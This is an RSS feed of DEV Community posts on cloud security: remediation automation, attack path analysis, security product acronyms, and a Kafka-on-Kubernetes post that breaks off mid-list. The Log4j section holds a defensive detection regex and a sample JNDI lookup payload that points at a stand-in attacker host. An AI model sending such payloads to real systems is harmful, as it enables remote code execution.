<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Brianna Blacet</title>
    <description>The latest articles on DEV Community by Brianna Blacet (@brianna_blacet_a60aae8af7).</description>
    <link>https://dev.to/brianna_blacet_a60aae8af7</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1050527%2F86d1fd7e-8eac-470d-92c4-dbff32fa1b94.jpeg</url>
      <title>DEV Community: Brianna Blacet</title>
      <link>https://dev.to/brianna_blacet_a60aae8af7</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/brianna_blacet_a60aae8af7"/>
    <language>en</language>
    <item>
      <title>Automated Versus Dynamic Remediation: Risks and Rewards</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Mon, 17 Jul 2023 19:44:31 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/automated-versus-dynamic-remediation-risks-and-rewards-192e</link>
      <guid>https://dev.to/ciscoemerge/automated-versus-dynamic-remediation-risks-and-rewards-192e</guid>
      <description>&lt;p&gt;When it comes to cloud security, there seems to be a constant refrain: automate, automate, automate. At first blush, it sounds logical, right? In theory, automation &lt;em&gt;should&lt;/em&gt; help eliminate human error, identify misconfigurations, check access and authorization, scan containers and Kubernetes clusters, accelerate the release process, and so on.&lt;/p&gt;

&lt;p&gt;And who &lt;em&gt;wouldn't&lt;/em&gt; want to automatically remediate problems, threats, and vulnerabilities, right? Well, actually, maybe you and/or your DevOps team.&lt;/p&gt;

&lt;p&gt;Before we dissect the issues involved, let's define what we mean by automatic remediation (also called auto-remediation).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is auto-remediation?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Generally speaking, auto-remediation is the use of tools that detect and remediate cybersecurity issues (misconfigurations, threats, vulnerabilities, and so on) without human intervention. A great example is a security orchestration, automation, and response (SOAR) tool, such as &lt;a href="https://www.splunk.com/en_us/software/splunk-security-orchestration-and-automation.html"&gt;Splunk Phantom&lt;/a&gt;, that gives security teams the ability to create "if this, then that" rules for their environment. For example, if the tool finds malware on an endpoint, it might automatically isolate the endpoint to ensure the malware doesn't infect other endpoints in the network. An alert would be sent to security staff to notify them of the problem and/or any action taken (which might include patching software or fixing misconfigurations, for example).&lt;/p&gt;
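&lt;p&gt;To make the "if this, then that" idea concrete, here's a minimal Python sketch of the kind of rules table a SOAR playbook encodes. The event fields and action names are invented for illustration; real playbooks are far richer.&lt;/p&gt;

```python
# Toy "if this, then that" remediation rules. The event fields and action
# names below are invented for illustration only.
RULES = [
    {"if": {"type": "malware", "asset": "endpoint"}, "then": "isolate_endpoint"},
    {"if": {"type": "misconfiguration", "asset": "bucket"}, "then": "restrict_bucket_policy"},
]

def decide(event):
    """Return the remediation action for the first rule the event matches,
    plus a notification so humans stay in the loop."""
    for rule in RULES:
        if all(event.get(k) == v for k, v in rule["if"].items()):
            return {"action": rule["then"], "notify": "security-team"}
    # No rule matched: fall back to a human-driven workflow.
    return {"action": "open_ticket", "notify": "security-team"}

print(decide({"type": "malware", "asset": "endpoint", "host": "web-07"}))
```

&lt;p&gt;Note that even the automated path sends a notification, keeping security staff aware of every action taken.&lt;/p&gt;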

&lt;p&gt;One of the major benefits of auto-remediation is that it's faster than human intervention. An excessive time lag between detection and remediation gives an attacker or piece of malware more opportunity to do damage. And since some malware can spread faster than celebrity gossip on Twitter, waiting even a few hours to remediate can be disastrous.&lt;/p&gt;

&lt;p&gt;In addition to its efficiency, auto-remediation also helps reduce the load on already overburdened teams. Tracking down problems and fixing them is a tedious, complicated job. Automation can allow humans to spend more time on other, less onerous activities.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's the problem?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;With so many benefits, it's hard to imagine why anyone would object to deploying an auto-remediation tool in their environment. But just like with self-driving cars, too much automation can present its own hazards.&lt;/p&gt;

&lt;p&gt;Here are some examples:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Limited context.&lt;/strong&gt; Even though AI has come a long way, it still has a long way to go when it comes to making judgment calls. One reason is that machine-learning models are limited by insufficient data. There's no way to feed a list of every possible threat or warning sign into a machine-learning model; those lists just don't exist. Over time, the data sets will grow (especially with new federated technologies that allow data sharing without compromising privacy), but even then, there will always be new monsters under the bed. What's more, every new piece of hardware or software, or change in configuration or cloud provider, reshapes the equation. In sum, there is an infinite number of items on the "crap that can go wrong" list. And since humans are the ones making these changes, we're often better equipped to be on alert for problems when we alter the environment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unforeseen consequences.&lt;/strong&gt; Sometimes, when software is allowed to make changes without human intervention or approval, things can go awry. For example, if an auto-remediation tool decides to isolate a whole server (as opposed to killing a specific process), it could result in outages and service-level agreement (SLA) violations. If the human is making the decision, they might be able to switch over to a redundant server, kill only the offending process, or take another, less drastic action. In most cases, humans will be less prone to overcorrection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Disproportionate reliance on the auto-remediation tool.&lt;/strong&gt; To explain this one, I'll use the self-driving car analogy again. Weather—excessive fog, rain, or snow—can obscure these vehicles' sensors and cause accidents. Similarly, if the auto-remediation tool hangs or fails (and the error is not caught in time), it could render your network vulnerable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Robot uprising.&lt;/strong&gt; Just kidding.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The bottom line is that if you do choose to use auto-remediation, extensive testing and tool validation are critical. DevOps teams will need to closely monitor the environment for unanticipated changes or events. If you're the one choosing the tool (but not one of the DevOps people who have to test and monitor it), be aware that the DevOps team may stop inviting you out for after-work cocktails in retaliation for foisting this burden upon them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamic remediation: a more prudent alternative?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A middle ground between manual and automated remediation is dynamic remediation. In this scenario, instead of relying completely on an auto-remediation tool, DevOps uses templates as guardrails to apply corrective actions. This allows your team to reap some of the benefits of automation, while mitigating some of the risk. Lightspin, for example, uses infrastructure as code (IaC) Terraform files to generate these templates for users to download and deploy. Users can customize the templates to fit their specific environments.&lt;/p&gt;
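&lt;p&gt;As a rough illustration of the template-as-guardrail idea, here's a Python sketch that fills environment-specific values into a Terraform-style remediation snippet before a human reviews and applies it. The resource names and template are invented for illustration, not an actual Lightspin artifact.&lt;/p&gt;

```python
from string import Template

# Hypothetical remediation template (illustrative only): enforce
# server-side encryption on a storage bucket via IaC.
REMEDIATION_TEMPLATE = Template("""\
resource "aws_s3_bucket_server_side_encryption_configuration" "$resource_name" {
  bucket = "$bucket_name"
  rule {
    apply_server_side_encryption_by_default {
      sse_algorithm = "aws:kms"
    }
  }
}
""")

def render_remediation(resource_name, bucket_name):
    """Fill in environment-specific values. A human reviews the rendered
    file before it is applied (for example, via 'terraform apply')."""
    return REMEDIATION_TEMPLATE.substitute(
        resource_name=resource_name, bucket_name=bucket_name)

print(render_remediation("logs_encryption", "acme-prod-logs"))
```

&lt;p&gt;The template automates the tedious part, while the review-and-apply step keeps a human in the loop.&lt;/p&gt;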

&lt;p&gt;Some of the major advantages of dynamic remediation include:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Customizability.&lt;/strong&gt; As I mentioned earlier, most environments are constantly growing, evolving, and changing. Dynamic remediation allows you to tweak and adjust the actions the tool takes, as necessary, in real time.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration of human intelligence.&lt;/strong&gt; As I mentioned earlier, fully automatic remediation is limited by the data available to machine-learning models. Keeping humans in the equation can lower the chance of overcorrection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;Appropriate&lt;/em&gt;&lt;/strong&gt; &lt;strong&gt;time lags.&lt;/strong&gt; Earlier, I explained how an excessive time lag between detection and remediation can create opportunities for a problem to escalate (lateral movement, for example). But that doesn't mean that &lt;em&gt;all&lt;/em&gt; time lags are a bad thing. A quick pause to examine wider context and appropriate alternatives may make the difference between a "good" decision and a decision that will result in an SLA violation. Context is everything.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Both dynamic and automated remediation will undoubtedly improve over time as datasets expand and as our technology grows increasingly sophisticated. In the meantime, just as with driverless cars, we should proceed with caution—continuously re-evaluating the risk/reward ratio we are comfortable with at any given moment.&lt;/p&gt;

&lt;p&gt;I'd love to hear your thoughts on this issue, especially if you work in security or DevOps. What level of risk is acceptable? At what level of risk do we lose the benefits of automation? Let me know in the comments. And don't forget to &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;connect with Outshift on Slack&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>autoremediation</category>
      <category>cybersecurity</category>
      <category>attackpath</category>
    </item>
    <item>
      <title>Attack Path Analysis: What It Is and Why You Should Care</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Wed, 28 Jun 2023 21:15:28 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/attack-path-analysis-what-it-is-and-why-you-should-care-mc9</link>
      <guid>https://dev.to/ciscoemerge/attack-path-analysis-what-it-is-and-why-you-should-care-mc9</guid>
      <description>&lt;p&gt;While you probably have most of the fundamental elements of your security stack in place, you may be missing a critical piece of the puzzle: attack path analysis.&lt;/p&gt;

&lt;p&gt;Attack path analysis is a proactive approach to security that helps you identify possible vulnerabilities and assess risks in advance of a breach. It is an important complement to the other components of your security strategy, such as threat intelligence, access control and authentication, attack surface management, network/endpoint security, incident response and recovery, and ongoing monitoring and threat hunting.&lt;/p&gt;

&lt;h3&gt;What is an attack path?&lt;/h3&gt;

&lt;p&gt;Although they are sometimes confused, an attack path is not synonymous with an attack vector. The term "attack vector" describes a type of attack, such as credential theft, social engineering, or phishing. In contrast, the term "attack path" refers to an end-to-end sequence of steps or actions that an attacker may take as they breach a target environment or application.&lt;/p&gt;

&lt;p&gt;A physical analog for an attack path is home security. For example, the attacker's first step might be to find their way through an exterior gate. Next, the invader may be able to enter your home via your front door, your back door, a side door, or a window. A comprehensive approach to home security includes an awareness of every possible entry point, so you can anticipate potential risks in advance. The same goes for your network or cloud environment.&lt;/p&gt;

&lt;p&gt;Depending on the target, a cyberattack path may be simple or complex. It may involve multiple actions (for example, access, privilege escalation, a vulnerability exploit, lateral movement, and/or data exfiltration). An attacker may have to navigate through multiple layers of an environment or application, including databases, endpoints, servers, or clouds. Some paths may be traversed rapidly, while others are carried out in stages (such as with a trojan or time bomb).&lt;/p&gt;

&lt;p&gt;To complicate the issue even more, attack paths are usually not static. They may evolve over time as you add microservices or scale out your applications.   &lt;/p&gt;

&lt;h3&gt;Why attack path analysis is so critical&lt;/h3&gt;

&lt;p&gt;Attack path analysis involves scanning your environment and creating a visual map that shows exploitable paths that a bad actor might leverage to breach your environment, as well as what data or resources will be vulnerable once a breach occurs. Here are some of the benefits:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;It gives you the opportunity to prioritize your efforts.&lt;/strong&gt; Once you identify the most vulnerable entry points and movement paths in your environment, you'll be able to focus resources in these areas first. This is especially helpful if you have a limited security budget.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;It allows you to build a multi-layered defense strategy.&lt;/strong&gt; As you analyze the attack paths in your environment, you'll know where to add security controls and safeguards (like container scanning, for example) and where to set up appropriate observability and monitoring solutions. Obviously, the more layers you add to your defense, the more effective you'll be in deterring attackers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;It assists with SOC 2 compliance audits.&lt;/strong&gt; Attack path analysis helps you achieve the account, permission, and environment isolation that SOC 2 requires. What's more, a good graph-based attack path analysis tool provides the visibility that auditors need to verify compliance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;It may help you respond to threats more quickly.&lt;/strong&gt; If you're aware of the attack paths in your environment and a breach occurs, it will be easier to locate and track an attacker's movements, which can speed remediation measures.&lt;/li&gt;
&lt;/ul&gt;
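&lt;p&gt;Under the hood, attack path analysis treats your environment as a graph: assets are nodes and possible attacker moves are edges. Here's a toy Python sketch that enumerates every simple path from an entry point to a crown-jewel asset; the topology is made up for illustration.&lt;/p&gt;

```python
# Toy model: nodes are assets, edges are possible attacker moves.
# The topology below is invented for illustration.
EDGES = {
    "internet": ["web_app", "vpn_gateway"],
    "web_app": ["app_server"],
    "vpn_gateway": ["app_server"],
    "app_server": ["customer_db", "secrets_store"],
    "secrets_store": ["customer_db"],
}

def attack_paths(graph, source, target, path=None):
    """Enumerate every simple (cycle-free) path from an entry point
    to a target asset via depth-first search."""
    path = (path or []) + [source]
    if source == target:
        return [path]
    found = []
    for nxt in graph.get(source, []):
        if nxt not in path:  # avoid revisiting nodes
            found.extend(attack_paths(graph, nxt, target, path))
    return found

for p in attack_paths(EDGES, "internet", "customer_db"):
    print(" -> ".join(p))
```

&lt;p&gt;Real tools layer risk scoring and prioritization on top of this kind of enumeration, since even modest environments produce far more paths than a team can review by hand.&lt;/p&gt;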

&lt;h3&gt;Case study: the Log4j attack path&lt;/h3&gt;

&lt;p&gt;To put attack-path analysis in context, let's use the example of Log4j—the infamous vulnerability that affected the Apache Log4j library. This vulnerability became big news because of the ubiquity of this open source logging utility. It allowed remote code execution, making it particularly dangerous.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A high-level Log4j attack path might involve the following steps:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The attacker scans for systems running a version of the utility that contains the vulnerability and establishes them as targets.&lt;/li&gt;
&lt;li&gt;The bad actor crafts an HTTP request with a payload in one of its headers (usually "User-Agent" or "Referer") to trigger the vulnerability.&lt;/li&gt;
&lt;li&gt;Next, the attacker sends the malicious request (a Java Naming and Directory Interface, or JNDI, lookup) to a vulnerable web application, server, or other service that uses the Log4j library for logging. At that point, the Log4j library processes the payload and paves the way for remote code execution.&lt;/li&gt;
&lt;li&gt;Remote code execution allows attackers to gain unauthorized access to the target service or system, move laterally, steal data, or install malware.&lt;/li&gt;
&lt;/ol&gt;
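&lt;p&gt;On the defensive side, the second step of this path leaves a recognizable fingerprint. Here's a simplified Python check for un-obfuscated JNDI lookup payloads in request headers; real attacks used obfuscated variants, so treat this as a first-pass filter, not a complete detector.&lt;/p&gt;

```python
import re

# Simplified signature for CVE-2021-44228 probes: a plain JNDI lookup token
# in a request header. Real attacks obfuscate this string, so this is a
# first-pass filter only.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell_probe(headers):
    """Return True if any header value carries a plain JNDI lookup payload."""
    return any(JNDI_PATTERN.search(v) for v in headers.values())

benign = {"User-Agent": "Mozilla/5.0"}
probe = {"User-Agent": "${jndi:ldap://attacker.example/a}"}
print(looks_like_log4shell_probe(benign))  # False
print(looks_like_log4shell_probe(probe))   # True
```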

&lt;p&gt;The graphic below depicts this Log4j attack path:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RT-prNvZ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0jn03wpqtwkcrpii4g1x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RT-prNvZ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0jn03wpqtwkcrpii4g1x.png" alt="Log4j Attack Path" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;What to look for in an attack path analysis tool&lt;/h3&gt;

&lt;p&gt;As you evaluate tools for attack path analysis, consider the following attributes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Comprehensiveness:&lt;/strong&gt; It's better to choose a robust tool that meets all of your needs than to "brew your own" solution. Think about the topology of your environment and look for a tool that can evaluate all possible attack paths.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scalability:&lt;/strong&gt; It's not always possible to anticipate the direction your organization will take in the future. But if you know, for example, that you'll probably be moving into a multicloud, hybrid cloud, or public-cloud environment, you should take this into account as you shop for an attack path analysis tool.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automation:&lt;/strong&gt; At the risk of sounding ridiculously obvious, the more you can automate your security processes, the better. That said, automation alone isn't enough. You need tools that will prioritize and contextualize their recommendations and alerts, so that you're not constantly deluged with false alarms and don't have to perform an exhaustive manual investigation every time you get an alert.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Visualization and reporting:&lt;/strong&gt; Graphical representations of your attack paths, vulnerabilities, and associated risks not only help you—they help all of your stakeholders (executives, auditors, and folks on different teams) understand your internal security landscape.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fast time to value:&lt;/strong&gt; Graph-based algorithms offer out-of-the-box results. You're too busy to spend weeks or months writing queries for a vendor's bespoke tool. Look for solutions whose cloud security researchers work closely with graph-algorithm engineers to provide contextual prioritization you can trust.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;At the end of the day, the right attack path analysis solution is the one that fits the requirements of your unique environment. By carefully evaluating tools based on the criteria above, you'll be most likely to make the right choice.&lt;/p&gt;

&lt;p&gt;I'd love to hear about your experiences with attack path analysis solutions. Do you have a favorite? If so, what do you like about it? Let me know in the comments. And don't forget to &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;connect with Outshift on Slack&lt;/a&gt;!&lt;/p&gt;

&lt;p&gt;&lt;small&gt;&lt;em&gt;Note: Special thanks to Jan Schulte and Luke Tucker for their collaboration on this post.&lt;/em&gt;&lt;/small&gt;&lt;/p&gt;

</description>
      <category>attackpath</category>
      <category>attackpathanalysis</category>
      <category>cybersecurity</category>
      <category>cloudsecurity</category>
    </item>
    <item>
      <title>What's in a Name? Decoding the Language of Today's Cloud-Native Security Solutions</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Sat, 17 Jun 2023 01:08:21 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/whats-in-a-name-decoding-the-language-of-todays-cloud-native-security-solutions-81a</link>
      <guid>https://dev.to/ciscoemerge/whats-in-a-name-decoding-the-language-of-todays-cloud-native-security-solutions-81a</guid>
      <description>&lt;p&gt;If your company develops cloud-native applications—especially if they reside in a hybrid or multicloud environment—security is probably high on your list of priorities. These applications and environments are characteristically complex, with a multitude of moving parts (microservices, APIs, Kubernetes clusters, and more), each of which can present an attack surface. There are often layers of abstraction, such as AWS Lambda, which may free you from some management tasks but simultaneously obscure visibility. You may be using open source software (OSS) components, which can heighten supply-chain security risks (more on this later). The rapid pace of development and accompanying deadline pressure may leave little time for rigorous security testing.&lt;/p&gt;

&lt;p&gt;All of these factors augment the need for end-to-end automated cloud-native security to protect the entire software-development lifecycle, from development to deployment to production, and across multiple clouds.&lt;/p&gt;

&lt;p&gt;That said, choosing the solution that's appropriate for you and your environment is anything but straightforward. The market is replete with cloud-native security solutions. How do you know which one is right for you? Adding to the confusion is the proliferation of buzzwords and acronyms that imply standardization (but are often more arbitrary than precise).&lt;/p&gt;

&lt;p&gt;For example, in 2021, the analyst firm Gartner published a &lt;a href="https://www.gartner.com/en/documents/4005115/innovation-insight-for-cloud-native-application-protection-platforms"&gt;report&lt;/a&gt; that popularized the term Cloud-Native Application Protection Platform, or CNAPP (I'll go deeper into its definition a little later in this blog). You'd think that all CNAPP solutions would have the same (or at least very similar) features and capabilities. But this is not necessarily true. For example, Palo Alto Networks' Prisma Cloud only provides data classification, malware scanning, and data governance for Amazon Web Services. Ermetic's CNAPP does not include a threat-intelligence feed. Cyscale has no cloud infrastructure entitlement management (CIEM) module. Some products provide more comprehensive compliance features. Most (but not all) provide both agents and agentless scanning features. And yet all of them are marketed as CNAPPs.&lt;/p&gt;

&lt;p&gt;The bottom line is that regardless of how they are labeled, you'll have to dig deeper than a product's classification to determine whether it will meet your needs. To help you get started, the following is a list of the most common cloud-native security product acronyms (in alphabetical order) and what they mean.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CASB: cloud access security broker&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;CASBs let you set policies for both managed and unmanaged cloud services. For example, they may be set to allow access to a suite of business tools but to block unauthorized software that could present a threat. They are also useful in ensuring compliance (with HIPAA, PCI, and so on) since they can be used to enforce data-handling policies. The basic checklist for a CASB solution is that it provides visibility, data security, threat prevention, and compliance, and protects against shadow IT. CASBs were conceived with the goal of protecting proprietary data stored in the cloud, and they provide policy and governance across multiple clouds.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CIEM: cloud infrastructure entitlement management&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;CIEMs are automated cloud security solutions that help protect against data breaches in public cloud environments. They continuously monitor the permissions and activities of entities to ensure that access controls remain appropriate. CIEM tools provide comprehensive reporting, help with access management, and strengthen cloud security posture. With a CIEM, an organization can monitor usage and entitlement data in real time, allowing it to detect high-risk changes, mitigate threats, and optimize permissions.&lt;/p&gt;
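&lt;p&gt;The core least-privilege check a CIEM automates can be sketched in a few lines of Python: compare what an identity has been granted with what it has actually used. The permission names and usage data below are invented for illustration.&lt;/p&gt;

```python
# Toy entitlement review of the kind a CIEM automates: compare permissions
# granted to an identity with the permissions it actually exercised
# (say, over 90 days of audit logs). All names here are invented.
granted = {"s3:GetObject", "s3:PutObject", "iam:PassRole", "ec2:TerminateInstances"}
observed_in_use = {"s3:GetObject", "s3:PutObject"}

# Anything granted but never used is a candidate for revocation.
unused = sorted(granted.difference(observed_in_use))
print("Candidate permissions to revoke:", unused)
```

&lt;p&gt;A real CIEM does this continuously, across thousands of identities and every cloud account, and contextualizes the results before recommending changes.&lt;/p&gt;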

&lt;p&gt;&lt;strong&gt;CNAPP: cloud-native application protection platform&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's how Gartner's "Market Guide for Cloud-Native Application Protection Platforms" defines and describes a CNAPP: "Cloud-native application protection platforms (CNAPPs) are a unified and tightly integrated set of security and compliance capabilities designed to secure and protect cloud-native applications across development and production. CNAPPs consolidate a large number of previously siloed capabilities, including container scanning, cloud security posture management, infrastructure as code scanning, cloud infrastructure entitlement management, runtime cloud workload protection and runtime vulnerability/configuration scanning."&lt;/p&gt;

&lt;p&gt;The analyst firm goes on to say that these offerings typically integrate into runtime cloud environments and development pipeline tools and that they include cloud security posture management (CSPM) capabilities, offer software composition analysis (SCA), and container scanning. Lastly, it notes that CNAPPs may include API testing and monitoring, static application security testing (SAST), dynamic application security testing (DAST), and runtime web application and API protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CSPM: cloud security posture management&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The National Institute of Standards and Technology defines security posture as the "status of an enterprise's networks, information, and systems based on information security resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes." CSPM tools continuously manage infrastructure as a service (IaaS), software as a service (SaaS) and platform as a service (PaaS) security posture through prevention, detection, and response to cloud infrastructure risks. &lt;a href="https://www.gartner.com/en/information-technology/glossary/cloud-security-posture-management"&gt;Gartner&lt;/a&gt; specifies that these tools should apply common frameworks, enterprise policies, and regulatory requirements to "proactively and reactively discover and assess risk/trust of cloud services configuration and security settings." It also proposes that CSPM should provide for automated or human-driven remediation of identified issues.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CWPP: cloud workload protection platform&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As opposed to CSPMs, CWPPs focus on protecting server workloads in hybrid, multicloud datacenter environments. They provide visibility for all workloads, whether they reside on physical machines, VMs, or containers, or are serverless. &lt;a href="https://www.gartner.com/reviews/market/cloud-workload-protection-platforms"&gt;Gartner&lt;/a&gt; (who, as you can see, has defined most of these security terms) says "CWPP offerings protect workloads using a combination of system integrity protection, application control, behavioral monitoring, intrusion prevention and optional anti-malware protection at runtime. CWPP offerings should also include scanning for workload risk proactively in the development pipeline." If your organization relies on cloud infrastructure or platforms such as IaaS or PaaS, a CWPP can help protect your workloads and applications running on those platforms. If you have a complex IT infrastructure that spans multiple cloud providers or combines cloud and on-premises resources, a CWPP can provide unified security management and protection across these environments.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SCA: software composition analysis&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;While SCA is not specific to cloud-native software, I'm including it here because Gartner mentions it in its CNAPP definition. SCA is a methodology for keeping track of OSS components. Although OSS is not inherently insecure, these components are often not authored in-house, making it hard to know whether a library is sustainably maintained. For example, if a security problem arises, how quickly will it be fixed? How quickly are problems disclosed? SCA lets dev teams track and analyze open source components, discover their supporting libraries, and identify their direct and indirect dependencies (including those that may have deprecated dependencies, vulnerabilities, and potential exploits). Once these components are scanned and inventoried, the tool generates a software bill of materials (SBOM), which is a critical tool for conducting audits, providing transparency and visibility into the software supply chain, and enabling organizations to understand the various open-source and third-party components incorporated into their software. When CVEs are discovered, an SBOM makes it faster to recognize where the OSS component is used in an application, so security teams can quickly apply patches.&lt;/p&gt;
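&lt;p&gt;Here's a schematic Python sketch of the SBOM cross-referencing step. The SBOM fragment and advisory feed are hand-written for illustration, and a real tool would use proper version-range semantics rather than exact matches.&lt;/p&gt;

```python
# A hand-written, CycloneDX-style SBOM fragment (illustrative only).
sbom = {
    "components": [
        {"name": "log4j-core", "version": "2.14.1"},
        {"name": "jackson-databind", "version": "2.13.4"},
    ]
}

# A hypothetical advisory feed; real tools match proper version ranges.
advisories = {
    "log4j-core": {"cve": "CVE-2021-44228", "affected": {"2.14.0", "2.14.1"}}
}

def flag_components(sbom, advisories):
    """Return (name, version, CVE) for every SBOM entry an advisory covers."""
    hits = []
    for comp in sbom["components"]:
        adv = advisories.get(comp["name"])
        if adv and comp["version"] in adv["affected"]:
            hits.append((comp["name"], comp["version"], adv["cve"]))
    return hits

print(flag_components(sbom, advisories))
```

&lt;p&gt;This is why an SBOM pays off when a new CVE lands: the lookup is instant instead of a scramble through build files.&lt;/p&gt;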

&lt;p&gt;&lt;strong&gt;A rose by any other name&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Acronyms and buzzwords aside, the important thing for cloud-native security is to have end-to-end lifecycle protection for cloud-native application environments that cover every stage and element—from development to deployment to production. You need to ensure that your tool can identify risks, help prioritize alerts, and remediate vulnerabilities with powerful attack path analysis.&lt;/p&gt;

&lt;p&gt;Here are some elements to look for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Code and CI/CD security&lt;/li&gt;
&lt;li&gt;The ability to scan IaC templates and scripts for security risks&lt;/li&gt;
&lt;li&gt;SBOM generation&lt;/li&gt;
&lt;li&gt;Deep visibility, including alerts with detailed context to assist with root-cause analysis and remediation&lt;/li&gt;
&lt;li&gt;Scanning for containers, APIs, serverless functions, and Kubernetes workloads&lt;/li&gt;
&lt;li&gt;Attack-path analysis&lt;/li&gt;
&lt;li&gt;An intuitive dashboard to visualize clusters and multicloud environments&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you'd like to try out the functionality I've covered in this article, consider Outshift's Panoptica. You can use its &lt;a href="https://www.panoptica.app/sign-up"&gt;free tier&lt;/a&gt; to protect 15 nodes and one Kubernetes cluster (forever!)—no credit card required. You can also check out the OSS projects that underpin Panoptica in the &lt;a href="https://www.panoptica.app/quickstart/open-source-projects"&gt;OpenClarity&lt;/a&gt; umbrella of tools.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;center&gt;We'd love to meet you. &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;Connect with Outshift on Slack&lt;/a&gt;!&lt;/center&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>cloudnative</category>
      <category>opensource</category>
      <category>security</category>
      <category>cnapp</category>
    </item>
    <item>
      <title>Kafka on Kubernetes: Is a DIY or Managed Option Right for You?</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Wed, 07 Jun 2023 22:17:05 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/kafka-on-kubernetes-is-a-diy-or-managed-option-right-for-you-2ml9</link>
      <guid>https://dev.to/ciscoemerge/kafka-on-kubernetes-is-a-diy-or-managed-option-right-for-you-2ml9</guid>
      <description>&lt;p&gt;Apache Kafka® and Kubernetes are a perfect duo. Kubernetes provides a highly scalable, resilient orchestration platform that simplifies the deployment and management of Kafka clusters, so DevOps can spend less time dealing with infrastructure and more time building applications and services. Experts expect this trend to accelerate as more organizations use Kubernetes to manage their data infrastructure.&lt;/p&gt;

&lt;p&gt;If you're in the planning stages, know that you have a range of options, beginning with whether to deploy Kafka yourself or purchase a managed solution. The right answer will depend on a number of factors, including your budget (DIY is not always cheaper!), the skill level of your staff, and any rules and regulations that govern your industry or your company. This blog will walk you through the options to consider, so you can help your organization make the right choice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why DIY?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Self-managed or "do-it-yourself" (DIY) Kafka has some advantages. You'll have more control over your deployment, including whether to extend it across multiple clouds. It may be easier to align with your internal security and operations policies, accommodate your specific data-residency concerns, and better control costs.&lt;/p&gt;

&lt;p&gt;In this scenario, your in-house staff must perform the following tasks:&lt;/p&gt;

&lt;ul&gt;
